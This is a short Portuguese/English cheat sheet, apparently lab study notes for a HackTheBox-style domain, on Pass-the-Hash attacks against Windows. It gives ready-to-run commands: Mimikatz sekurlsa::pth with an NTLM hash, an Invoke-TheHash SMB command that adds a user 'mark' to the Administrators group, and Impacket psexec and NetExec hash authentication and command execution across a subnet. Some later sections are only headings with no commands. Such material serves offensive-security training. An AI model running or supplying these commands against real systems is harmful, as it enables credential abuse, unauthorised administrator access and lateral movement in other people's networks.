Pass the Hash (PtH)

Pass the Hash from Windows Using Mimikatz

mimikatz.exe privilege::debug "sekurlsa::pth /user:julio /rc4:64F12CDDAA88057E06A81B54E73B949B /domain:inlanefreight.htb /run:cmd.exe" exit
  • Podemos tentar nos conectar a uma pasta compartilhada chamada julio no controlador de domínio.

dir \\dc01\julio

Invoke-TheHash com SMB

  • O comando a seguir utilizará o método SMB para execução de comandos, criando um novo usuário chamado mark e adicionando-o ao grupo Administradores.

cd C:\tools\Invoke-TheHash\
powershell -ep bypass
Import-Module .\Invoke-TheHash.psd1
Invoke-SMBExec -Target 172.16.1.10 -Domain inlanefreight.htb -Username julio -Hash 64F12CDDAA88057E06A81B54E73B949B -Command "net user mark Password123 /add && net localgroup administrators mark /add" -Verbose
  • Pass the Hash with Impacket PsExec

impacket-psexec administrator@10.129.201.126 -hashes :30B3783CE2ABF1AF70F77D0660CF3453
  • Pass the Hash with NetExec

netexec smb 172.16.1.0/24 -u Administrator -d . -H 30B3783CE2ABF1AF70F77D0660CF3453
  • NetExec - Execução de Comandos

netexec smb 10.129.201.126 -u Administrator -d . -H 30B3783CE2ABF1AF70F77D0660CF3453 -x whoami
  • Pass the Hash with evil-winrm (Linux)

Pass the Hash with RDP (Linux)

  • Ative o Modo de Administrador Restrito para permitir o PtH.

  • Após adicionar a chave de registro, podemos usá-la xfreerdpcom a opção /pthpara obter acesso RDP:

Last updated